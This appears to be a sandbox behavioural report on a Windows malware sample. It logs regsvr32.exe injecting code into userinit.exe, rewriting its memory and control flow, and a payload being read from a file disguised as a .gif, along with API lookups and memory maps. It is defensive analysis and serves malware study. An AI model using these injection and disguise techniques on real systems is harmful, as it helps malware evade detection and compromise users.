Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d720000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ìï, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d75266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d752542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d751d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d75238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7520c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d751fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d751e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d751f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d751ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d75216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7522be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7521e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #49: userinit.exe

222

0

»

Information	Value
ID	#49
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:08, Reason: Child Process
Unmonitor	End Time: 00:03:11, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x80c
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 810 0x 534 0x 590

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00126fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0013ffff	Private Memory	rw	-
private_0x0000000000140000	0x00140000	0x0023ffff	Private Memory	rw	-
pagefile_0x0000000000240000	0x00240000	0x00307fff	Pagefile Backed Memory	r	-
private_0x0000000000310000	0x00310000	0x0034ffff	Private Memory	rw	-
pagefile_0x0000000000350000	0x00350000	0x00351fff	Pagefile Backed Memory	rw	-
private_0x0000000000360000	0x00360000	0x003dffff	Private Memory	rw	-
oleaccrc.dll	0x003e0000	0x003e0fff	Memory Mapped File	r	-
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	rwx	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
pagefile_0x0000000000680000	0x00680000	0x00681fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00690000	0x00690fff	Memory Mapped File	r	-
private_0x00000000006a0000	0x006a0000	0x006affff	Private Memory	rw	-
pagefile_0x00000000006b0000	0x006b0000	0x0078efff	Pagefile Backed Memory	r	-
private_0x0000000000790000	0x00790000	0x009affff	Private Memory	rw	-
private_0x0000000000790000	0x00790000	0x0089cfff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00920fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00924fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00928fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x0092cfff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00930fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00934fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00938fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x0093cfff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00940fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00944fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00948fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x0094cfff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00950fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00954fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00958fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x0095cfff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00960fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00964fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x00968fff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x0096cfff	Private Memory	rw	-
private_0x0000000000970000	0x00970000	0x009affff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00aaffff	Private Memory	rw	-
private_0x0000000000ab0000	0x00ab0000	0x00caffff	Private Memory	rw	-
userinit.exe	0x00cf0000	0x00cf8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d00000	0x00d00000	0x018fffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01900000	0x0222ffff	Memory Mapped File	r	-
pagefile_0x0000000002230000	0x02230000	0x02622fff	Pagefile Backed Memory	r	-
private_0x0000000002630000	0x02630000	0x026b2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026b6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026bafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026befff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026c2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026c6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026cafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026cefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026d2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026d6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026dafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026defff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026e2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026e6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026eafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026eefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026f2fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026f6fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026fafff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x026fefff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02704fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02708fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0270cfff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02712fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02716fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0271afff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0271efff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02724fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02728fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0272cfff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02732fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x02736fff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0273afff	Private Memory	rw	-
private_0x0000000002630000	0x02630000	0x0273ffff	Private Memory	-	-
private_0x0000000002700000	0x02700000	0x027d0fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027e6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02804fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02808fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280cfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02810fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02826fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282efff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02844fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x02848fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x0284cfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028b2fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028d0fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02912fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02962fff	Private Memory	rwx	-
private_0x0000000002970000	0x02970000	0x02a6ffff	Private Memory	-	-
private_0x0000000002b70000	0x02b70000	0x02c6ffff	Private Memory	rw	-
private_0x0000000002cd0000	0x02cd0000	0x02d0ffff	Private Memory	rw	-
sortdefault.nls	0x02d10000	0x02fdefff	Memory Mapped File	r	-
comctl32.dll	0x6d720000	0x6d7a3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd8008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x810, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d720000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = <ì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
